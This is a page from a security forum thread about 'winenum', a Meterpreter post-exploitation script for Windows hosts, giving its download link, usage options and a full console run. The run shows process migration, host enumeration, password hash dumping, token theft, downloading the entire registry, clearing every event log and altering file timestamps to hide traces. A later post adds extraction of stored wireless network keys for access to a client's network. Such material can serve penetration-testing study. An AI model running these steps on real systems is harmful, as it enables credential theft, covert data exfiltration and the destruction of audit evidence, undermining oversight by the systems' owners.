Page 2 of 2 FirstFirst 12
Results 11 to 14 of 14

Thread: Meterpeter Script for Quick Local Enumeration of Windows Hots

  1. #11

    Default

    Updated the Script 12/14/2008
    Expanded the options of the script plus added an option to migrate de meterpreter session since some exploits like the browser one will dies after the user closes the hanged browser the code was provided by Natron on the Metasploit mailing list, plus made dumping the registry and options
    http://www.darkoperator.com/winenum.tar.gz
    Code:
    meterpreter > run winenum -h
    Windows Local Enumerion Meterpreter Script by Darkoperator
    Carlos Perez carlos_perez@darkoperator.com
    Usage:
    
    -h    This help message.
    
    -m    Migrates the Meterpreter Session from it current process to a new one
    
    -c    Changes Access Time, Modified Time and Created Time of executables
          that where run on the target machine and clear the EventLog
    
    -r    Dumps, compresses and download entire Registry
    
    [-] Error while running command run: exit
    meterpreter > run winenum -m -c -r
    [*] Launching hidden cmd.exe...
    [*] Process 2088 created.
    [*] Current process is cmd.exe (2676).  Migrating to 2088.
    [*] Migration completed successfully.
    [*] New server process: cmd.exe (2088)
    [*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
    [*] New session on 192.168.1.147:1050...
    [*] Saving report to /tmp/192.168.1.147_20081214.405428587
    [*] Checking if WIN2K301 is a Virtual Machine ........
    [*]     This is a VMware Workstation/Fusion Virtual Machine
    [*]     This is a VMWare virtual Machine
    [*] Running Command List ...
    [*]     running command cmd.exe /c set
    [*]     running command arp -a
    [*]     running command ipconfig /all
    [*]     running command ipconfig /displaydns
    [*]     running command route print
    [*]     running command net view
    [*]     running command netstat -na
    [*]     running command netstat -ns
    [*]     running command net share
    [*]     running command net group
    
    [*]     running command net user
    [*]     running command net localgroup
    [*]     running command net view /domain
    [*]     running command netsh firewall show config
    [*]     running command tasklist /svc
    [*] Running WMIC Commands ....
    [*]     running command wimic computersystem list
    [*]     running command wimic useraccount list
    [*]     running command wimic group
    [*]     running command wimic service list brief
    [*]     running command wimic volume list brief
    [*]     running command wimic process list brief
    [*]     running command wimic startup list full
    [*]     running command wimic qfe
    [*] Dumping password hashes...
    [*] Hashes Dumped
    [*] Getting Tokens...
    [*] All tokens have been processed
    [*] Dumping and Downloading the Registry
    [*]     Exporting HKCU
    [*]     Compressing HKCU into cab file for faster download
    [*]     Exporting HKLM
    [*]     Compressing HKLM into cab file for faster download
    [*]     Exporting HKCC
    [*]     Compressing HKCC into cab file for faster download
    [*]     Exporting HKCR
    [*]     Compressing HKCR into cab file for faster download
    [*]     Exporting HKU
    [*]     Compressing HKU into cab file for faster download
    [*]     Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
    [*]     Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
    [*]     Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
    [*]     Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
    [*]     Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
    [*]     Deleting left over files
    [*] Clearing Event Logs, this will leave and event 517
    [*]     Clearing the security Event Log
    [*]     Clearing the system Event Log
    [*]     Clearing the application Event Log
    [*]     Clearing the directory service Event Log
    [*]     Clearing the dns server Event Log
    [*]     Clearing the file replication service Event Log
    [*] Alll Event Logs have been cleared
    [*] Changing Access Time, Modified Time and Created Time of Files Used
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\route.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\net.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32
    \wbem\wmic.exe
    [*] Done!
    
    meterpreter >

  2. #12

    Default

    Josh Wright from Inguardians published a great paper called Vista Wireless Power Tools on the new features of Windows Vista wireless commands plus published several tools. I added the enumerations commands to Winenum plus it will now export the registry keys where the wireless configured networks of Windows XP and Windows Vista machines is stored, this files can be imported into the pentesters windows box to gain access to the clients network or to get the wireless keys using other tools after importing.

  3. #13
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Session kill

    I have found this script works extremely well, great job! Just a quick question, is there a command that could be incorporated into the script to kill the active meterpreter session once it has completed the enumeration? Sometimes preferable over backgrounding. Thanks.

  4. #14

    Default

    just append to the end

    shell.stop

    thant should kill the meterpreter session

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •